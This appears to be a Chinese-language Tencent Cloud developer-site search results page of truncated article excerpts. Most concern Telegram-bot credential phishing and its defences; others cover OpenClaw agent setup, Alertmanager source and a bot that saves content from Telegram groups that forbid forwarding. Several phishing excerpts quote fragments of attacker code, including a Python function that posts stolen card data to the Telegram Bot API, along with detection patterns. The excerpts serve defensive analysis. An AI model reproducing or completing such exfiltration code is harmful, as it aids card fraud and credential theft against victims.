文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

本文提出一套涵盖终端行为监控、身份认证加固、浏览器运行时保护与威胁情报提取的多维防御框架,并辅以可落地的代码示例,验证对异常Telegram进程通信、WebView劫持及Bot API调用的识别能力。...*;进程内存中存在敏感关键词(如“password”, “otp”, “cookie”)与Telegram API调用共现。...= sysmon_log.get('DestinationHostname', '')if 'api.telegram.org' in dest:# 检查是否伴随敏感数据写入(需结合Event ID...安全团队应从钓鱼页面源码中提取以下IoC:bot/sendMessagechat_id: "CHANNEL_ID>"频道用户名(如@scam_channel_2025)自动化提取脚本示例...防御的关键在于“上下文感知”:同一api.telegram.org请求,在普通用户聊天中属正常,在财务人员终端上伴随密码字段输入则高度可疑。因此,安全架构必须融合身份、设备、行为与内容四维上下文。

32010

多通道钓鱼攻击的演化与行为安全防御模型研究

这种通信渠道的碎片化为攻击者提供了新的突破口:用户在非正式沟通场景(如 Slack 私信或 WhatsApp 群组)中对可疑内容的警惕性显著低于处理工作邮件,从而降低了社会工程攻击的门槛。...例如,通过 Microsoft Graph API 向 Teams 用户推送伪造的“IT 安全警报”;或利用 Telegram Bot 向财务人员发送“CEO 指令”要求紧急转账。...该模型不关注单条消息内容,而是分析:交互频率与时序:某供应商是否突然频繁联系?渠道偏好突变:长期使用邮件的同事为何改用 Telegram?请求类型异常:HR 是否会直接索要 MFA 令牌?...3.3 系统架构模型由三层组成:数据摄取层:通过企业授权的 API(如 Microsoft Graph、Slack Events API)收集跨平台通信元数据(非完整内容,以保护隐私);行为图谱构建层:...模型,实时计算用户交互异常分数;强化终端防护:在浏览器扩展或移动端 App 中嵌入钓鱼页面拦截模块,即使链接来自“可信”聊天也进行二次验证。

19010
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    钓鱼团伙用Telegram机器人“接单”:欧洲凭证窃取进入“实时客服”时代

    操作员随即通过同一机器人发送指令,触发二次验证流程,并诱导受害者在后续弹出的“安全确认”页面中输入短信验证码。整个过程耗时不到90秒,且全程由机器人协调完成,无需人工值守。这并非孤例。...阶段2:数据捕获钓鱼页面表单提交后,数据不直接存入数据库,而是通过后端脚本(如PHP或Node.js)调用Telegram Bot API,将信息推送至私有频道:// phishing-handler.php...网络层:封禁高风险Telegram基础设施在防火墙或代理中,基于威胁情报封禁已知与钓鱼相关的Telegram Bot Token、Channel ID对应的IP段;使用DNS过滤服务(如Cisco Umbrella...应用层:部署数据外泄监测(DLP)增强规则监控Web应用日志中向Telegram API发起的请求,尤其是包含 sendMessage、sendDocument 等关键词的POST;对内部系统设置出站流量基线...它模糊了传统边界安全的定义,迫使防御者思考:当攻击者用聊天软件管理犯罪时,我们的安全体系是否还停留在防火墙时代?答案显然是否定的。未来的反钓鱼战争,不仅是技术对抗,更是速度、智能与协同的较量。

    17210

    钓鱼攻击中窃取数据的流转路径与防御机制研究

    攻击者首先在Telegram上创建Bot并获取token,随后在钓鱼脚本中调用Telegram的sendMessage接口。...分类依据包括域名后缀(如@company.com)、字段结构(是否含CVV、卡号)、以及是否触发自动验证模块(如成功登录测试API)。...交易通常在Telegram群组、俄语论坛(如Exploit.in)或专用暗网市场(如BreachForums)进行。买家可要求“试登”(即卖家现场演示登录成功),以验证有效性。...以下Python脚本展示如何集成企业SIEM与身份提供商(如Azure AD),实现自动化响应:import requestsimport jsondef revoke_user_sessions(user_id...()# 调用API重置密码(略去具体实现)update_user_password(user_id, new_pass)notify_user_via_secure_channel(user_id, new_pass

    17810

    Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

    Bot监听特定命令,例如:/verify :触发二次验证模拟页面;/session :注入会话Cookie实施接管;/status id>:查询某凭证是否已用于登录。...可通过以下方式提取IOC:监控外联请求中包含api.telegram.org/bot的HTTP流量;提取Bot Token模式(格式:数字:字母数字串);关联短链(如bit.ly、cutt.ly)解析后的...第二,Bot Token的动态轮换。攻击者可每日更换Bot,使静态规则失效。需结合流量行为(如高频POST至Telegram API)而非仅依赖Token字符串。第三,用户跨平台信任惯性。...6 结论Telegram机器人在欧洲凭证钓鱼中的应用,标志着攻击模式从“静态投递”向“动态交互”的演进。其通过Bot API实现数据实时回传与操作指令下发,显著缩短攻击窗口并提升成功率。...本文提出的三层防御框架——基础设施封禁、认证机制加固、SOC行为监测——已在模拟环境中验证有效性。未来,随着Signal、WhatsApp等平台开放Bot功能,类似威胁可能扩散。

    24910

    玩转OpenClaw|云上OpenClaw(Clawdbot)快速接入Discord指南

    在面板中可以支持腾讯混元、腾讯云DeepSeek、月之暗面Kimi、MiniMax、智谱GLM等常用模型的API Key配置,也支持配置其他自定义模型(如OpenAI GPT、Google Gemini...Channel配置-接入Discord接下来进入 Select channel 步骤,通过键盘方向键选中 Discord (Bot API) ,并且回车确认。...验证机器人Bot您可以选择 Hatch in TUI ,在OpenClaw TUI中简单对话,验证是否正常工作。如果前面步骤已经正确完成配置,此时可以看到OpenClaw以AI的方式进行对话。...场景三:生成并运行代码(从“写”到“跑”)只需要说一句“新建一个 Python 文件,输出 hello world”,OpenClaw 会完成完整链路:在指定目录创建脚本文件写入标准 Python 代码执行脚本进行验证把运行结果回传给我这里最关键的一点是...:Agent 不止写代码,还会自己验证是否可运行。

    13.3K152

    听GPT 讲Alertmanager源代码--notify

    config/:这个目录包含了Alertmanager配置的相关代码,包括配置的加载、解析和验证。 dispatch/:这个目录包含了告警分发的相关代码,它负责将告警路由到正确的接收者。...checkTextResponseError函数:用于检查Slack响应中是否出现错误,比如Slack API返回的错误信息。...然后,它会检查消息的长度是否超出SNS的限制,如果超出,则截断消息长度,并在末尾添加省略号。最后,返回验证和截断后的消息。...在wechat.go文件中,Notifier用于发送微信消息通知。 token:token是用于身份验证的结构体,表示通过微信API访问身份验证需要的token信息。...Check函数用于检查HTTP响应的状态码是否存在于给定的范围内。 NewErrorWithReason函数用于创建一个带有原因的错误。 Error函数用于返回一个不带有原因的错误。

    1.7K10

    一封“域名续费”邮件,竟让WordPress站长银行卡被掏空——新型钓鱼攻击借Telegram实时收割支付信息

    第二阶段:高保真仿冒支付页面,复刻用户体验点击邮件中的“续费”链接后,用户会被导向一个看似来自WordPress.com或知名注册商(如GoDaddy、Namecheap)的支付页面。...Secure页面window.location.href = '/3ds-verify.html';});随后,用户被引导至一个伪造的“银行3D Secure验证”页面,显示“安全验证中…”,并要求输入手机收到的短信验证码...攻击者在后端使用Python或Node.js脚本,将收集到的数据通过Telegram Bot API实时推送至私有频道:# 攻击者服务器后端(Python + python-telegram-bot)import...提供稳定API);数据传输端到端加密(Telegram MTProto协议);攻击者可通过手机App实时监控“战果”,甚至设置关键词提醒。...;引入行为分析:如检测用户是否从邮件直接跳转至支付页,可触发额外验证。

    19310

    TG限制群组转存机器人

    文章目录[隐藏] 1.部署 2.环境变量 3.使用方法 4.批量转存 5.项目地址 Telegram 在2021年底的一次更新中为群组增加了“禁止转发”功能,开启后普通成员便无法从群组中复制、转发或者保存任何内容...2.环境变量 想要让代码正确的跑起来,在部署时还需要设置以下环境变量:API_ID, API_HASH, SESSION, BOT_TOKEN, AUTH, FORCESUB 。...其中 API_ID 和 API_HASH 可以从 https://my.telegram.org/apps 获取,登陆后直接复制即可。 SESSION 可以使用这个网页运行一段小程序来获取。...点击运行后类型选择 p ,再按提示依次输入 API_ID, API_HASH 和注册手机号,完成后即可在收藏夹中找到 SESSION 。...AUTH 为管理员的账号 ID ,可以通过 @myidbot 获取。 FORCESUB 是使用该机器人必须关注的频道(Channel)名,需要新建一个频道并将上一步新建的机器人设为管理员。

    14.4K20

    agent实践

    OpenClaw 原名 Clawdbot,是一款可运行在个人环境中的高权限 AI 智能体,支持通过 WhatsApp、飞书、Telegram 等常用聊天软件交互,能实现邮件发送、日程管理、数据查询等自动化任务...聊天软件(Channel)配置 最新OpenClaw镜像已支持飞书,但是在onboard流程中不会显示; ⚠️ 这里请大家先跳过!后续我们通过增加channel的方式添加!...ID和APP Secret是否已正确配置。...(操作见上一步:添加飞书channel配置-配置APP ID与APP Secret) 3.添加事件:点击页面中的 “添加事件”,在弹出的事件列表中,选择 “消息与群组” 分类,勾选 “接收消息”,点击...”),点击进入; 系统将自动启动私聊窗口,发送任意消息(如 “你好”“查询今日日程”); 验证结果:如果收到 OpenClaw 的回复,即为飞书接入成功 大家快快用起来吧!!!

    25.6K4020

    TRENDRADAR Docker 容器化部署指南

    e TELEGRAM_CHAT_ID="你的telegram_chat_id" \ -e EMAIL_FROM="你的发件邮箱" \ -e EMAIL_PASSWORD="你的邮箱密码或授权码...e TELEGRAM_BOT_TOKEN="你的telegram_bot_token" \ -e TELEGRAM_CHAT_ID="你的telegram_chat_id" \ -e EMAIL_FROM...推送功能测试以企业微信推送为例,验证消息是否送达:确保环境变量 WEWORK_WEBHOOK_URL 已正确配置(或 config.yaml 中企业微信配置正确)查看推送日志确认无错误:docker logs...配置文件加密对于包含敏感信息(如API密钥、推送令牌)的配置文件,可使用加密工具保护: 展开...-R 1000:1000 /opt/trendradar,确保 output 目录可写) 配置文件错误:检查 config.yaml 格式是否正确,可使用在线YAML验证工具 环境变量格式错误:确保环境变量值使用引号包裹

    1.5K20

    玩转OpenClaw|云上OpenClaw(Clawdbot)快速接入WhatsApp指南

    在面板中可以支持腾讯混元、腾讯云DeepSeek、月之暗面Kimi、MiniMax、智谱GLM等常用模型的API Key配置,也支持配置其他自定义模型。...如果前面步骤中已在腾讯云控制台中完成模型配置,可以跳过此步骤。如果尚未进行模型配置,可以在此步通过命令行配置模型API Key。...OpenClaw 会先确认必要信息(如城市),然后创建对应的 cron 任务。整个过程中,我们可以不需要接触服务器、不需要写定时表达式,只是像和人说话一样描述需求,任务就变成了一个长期运行的自动流程。...场景三:生成并运行代码(从“写”到“跑”)只需要说一句“新建一个 Python 文件,输出 hello world”,OpenClaw 会完成完整链路:在指定目录创建脚本文件写入标准 Python 代码执行脚本进行验证把运行结果回传这里我们可以看到...:Agent不止写代码,还会自己验证是否可运行。

    4.6K41

    腾讯云Lighthouse 一键部署 OpenClaw 转化为专属股市分析师的 Skills 实战教程

    OpenClaw(原名 Clawdbot/Moltbot ;有种三姓家奴的感觉.... )是一款开源的个人 AI 助理工具,能够通过聊天软件(如 QQ、飞书、企业微信、钉钉、Telegram、Discord...PS:点击获取API Key:配置模型:输入 API Key,选择提供商与模型(如 腾讯云 DeepSeek)。添加:新增模型Channel 配置:可先跳过,后续单独添加。配置完成后,自动保存。 ...在“开发管理” > “基本信息”中,复制 AppID(机器人 ID)。点击“生成”或“查看”获取 AppSecret(机器人密钥),安全保存(丢失需重新生成)。...添加 Lighthouse 实例的公网 IP,保存(必须步骤,否则无法连接)。在“沙箱配置”中,选择“个人聊天(消息列表中配置)”。添加测试成员(你的 QQ 号),便于后续添加机器人。...(图:Lighthouse 应用管理 - Channel 配置界面示例)测试与验证在手机或电脑 QQ 中,搜索机器人 QQ 号或通过沙箱成员添加。使用手机 QQ 扫描添加(类似添加好友)。

    3.2K1110

    使用n8n搭建服务器监控系统:从Webhook到Telegram告警的完整实现

    rand -hex 32命令生成强随机字符串Telegram Chat ID:与Bot对话后访问 https://api.telegram.org/bot/getUpdates...获取Telegram User ID:同上述方法获取,在返回的JSON中查找from.id字段监控数据格式:系统通过Webhook接收JSON格式的监控数据,包含以下字段:server_name: 服务器名称...: 'YOUR_TELEGRAM_CHAT_ID', // 允许使用机器人的用户ID列表 ALLOWED_USER_IDS: ['YOUR_TELEGRAM_USER_ID'], // 告警阈值配置...配置项:Respond With: First Incoming ItemResponse Code: 200这样可以确保监控脚本能够正确判断数据是否提交成功。...完整工作流视图执行以下命令进行安装/配置:从n8n编辑器界面可以看到完整的监控工作流,包含主流程和扩展功能:主流程:接收服务器数据配置和验证Token认证分流处理监控数据检查是否需要告警发送告警到Telegram

    2.2K100

    基于“Smishing Triad”事件的短信钓鱼攻击机制与防御体系研究

    其流程如下:用户在假页面输入卡信息;后端脚本立即调用Apple/Google的API尝试注册该卡;银行向用户手机发送OTP以验证绑定;假页面提示“请输入银行验证码以完成支付”;用户提交OTP后,卡成功绑定至攻击者设备...此模式绕过了传统卡盗刷所需的CVV与地址验证(AVS),因移动钱包交易通常仅需设备解锁(如Face ID)即可完成。...[.]com);C2通信隐蔽化:数据通过HTTPS POST至中间脚本,再由Python脚本推送至Telegram Bot。...os.getenv('TG_CHAT_ID')def exfiltrate_card_data(card_info):url = f"https://api.telegram.org/bot{BOT_TOKEN...4 现有防御机制的失效原因4.1 短信过滤系统的局限性运营商级短信过滤主要依赖关键词黑名单(如“fee”“pay now”)与发件人ID验证(如STIR/SHAKEN)。

    23010
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券